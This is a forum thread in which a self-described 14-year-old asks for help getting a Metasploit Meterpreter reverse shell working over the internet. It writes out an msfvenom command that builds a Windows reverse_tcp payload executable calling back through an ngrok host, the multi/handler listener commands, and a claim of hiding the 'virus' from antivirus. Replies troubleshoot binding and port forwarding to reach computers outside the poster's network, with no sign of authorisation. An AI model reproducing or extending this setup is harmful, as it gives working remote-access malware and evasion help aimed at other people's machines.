Forum Thread: Tcp Reverse Listener [Meterpreter] Directly Close

Hey there!

I am Luuk a 14 year old boy who's very intrested in cyber security.

When I was little smaller ; I always dream about being a cool hacker.

Like 1 year ago I decided to start so i made a usb with kali linux on it and i learned the basics from metasploit meterpreter payloads I also discovered how to hide virus for a lot of av like windows defender. I also learned the basic commands of the terminal and working with armitage. But I have 1 problem ;

Every time when i want to start a listener i make the payload like this msfvenom -p windows/meterpreter/reverse_tcp LHOST=tcp.ngrok.io LPORT=the port of ngrok -f exe > payload.exe

So thats done and i wanted to start a listener. I open metasploit and type:

use multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 127.0.0.1

set lport 80

exploit

Ok so a few month's ago it would say started reverse handler ........ And it started to listen

Now it says started reverse handler and a new line is opened. What!!! What's going on

When i search the job with services its listening but when i type run {job nummer}

it says did you wanted a reversebindlistenadress

Failed to bind 127.0.0.1

failed to bind 0.0.0.0

So thats my problem oh. Extra note: I use ngrok for meterpreter over wan {i can't port forward for some reason}

It would be great if I can get a answer thanks and happy hacking!

5 Responses

Try another port.

THANKS FOR THE REPLY BUT I ALREADY TRIED PORT 433 4444 21 AND SO ON

1: I think u must put another IP!

Not 127.0.0.1

do ifconfig and there should be an IP ( 192.168.91.134 for example)
if u try to create a connection for a computer that is connected to the same router as u!

BUT
if u try to make a connection to a computer that is not connected to ur router THEN
1: U must port forward
2: Check ur global IP (IP that it shows for other computers- for computers that aren't connected to ur router)

thanks bro! so i need to open a port for my public ip i understand that but the problem is that i can't port forward from my router site. Is there a site or tool that i can use in stead of ngrok because with ngrok you need to put 127.0.0.1 for a listener and when you make the virus you need to put tcp.ngrok.io as ip so sorry bro but im noob; maybe you can solve it ?

Dude......... Do u wanna "hack" a computer on ur network ?

Share Your Thoughts

  • Hot
  • Active